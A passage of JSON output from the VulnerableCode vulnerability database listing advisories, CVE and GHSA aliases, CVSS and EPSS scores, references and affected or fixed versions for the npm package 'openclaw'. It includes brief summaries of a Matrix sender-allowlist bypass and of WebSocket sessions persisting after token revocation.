"VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "CVE-2026-35662", "GHSA-x2cm-hg9c-mf5w" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1728-wc17-dud6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89969?format=api", "vulnerability_id": "VCID-1j3m-fecr-f7cn", "summary": "OpenClaw: Matrix thread root and reply context bypass sender allowlist\n## Summary\nMatrix thread root and reply context bypass sender allowlist\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: Real in shipped v2026.3.28 Matrix because fetched thread-root/reply context bypasses sender allowlists, with unreleased mainline filtering fix.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `8a563d603b70ef6338915f0527bee87282c3bad5` — 2026-03-31T17:09:03+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41376", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04376", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.0439", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04402", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41376" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/8a563d603b70ef6338915f0527bee87282c3bad5", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:33:35Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/8a563d603b70ef6338915f0527bee87282c3bad5" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rg8m-3943-vm6q", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:33:35Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rg8m-3943-vm6q" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41376", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41376" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-matrix-thread-context-allowlist-bypass-via-sender-validation", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" }, { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" }, { "value": "2.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:33:35Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-matrix-thread-context-allowlist-bypass-via-sender-validation" }, { "reference_url": "https://github.com/advisories/GHSA-rg8m-3943-vm6q", "reference_id": "GHSA-rg8m-3943-vm6q", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-rg8m-3943-vm6q" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41376", "GHSA-rg8m-3943-vm6q" ], "risk_score": 3.0, "exploitability": "0.5", "weighted_severity": "5.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-1j3m-fecr-f7cn" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90837?format=api", "vulnerability_id": "VCID-1p3b-pfnn-x7ad", "summary": "Duplicate Advisory: OpenClaw's device removal and token revocation do not terminate active WebSocket sessions\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-2pr2-hcv6-7gwv. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.28 fails to disconnect active WebSocket sessions when devices are removed or tokens are revoked. Attackers with revoked credentials can maintain unauthorized access through existing live sessions until forced reconnection.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw/commit/7a801cc451e9e667b705eeccff651923a1b8c863", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/7a801cc451e9e667b705eeccff651923a1b8c863" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2pr2-hcv6-7gwv", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2pr2-hcv6-7gwv" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34503", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34503" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-incomplete-websocket-session-termination-on-device-removal-and-token-revocation", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-incomplete-websocket-session-termination-on-device-removal-and-token-revocation" }, { "reference_url": "https://github.com/advisories/GHSA-89hr-6x2p-8xjv", "reference_id": "GHSA-89hr-6x2p-8xjv", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-89hr-6x2p-8xjv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": 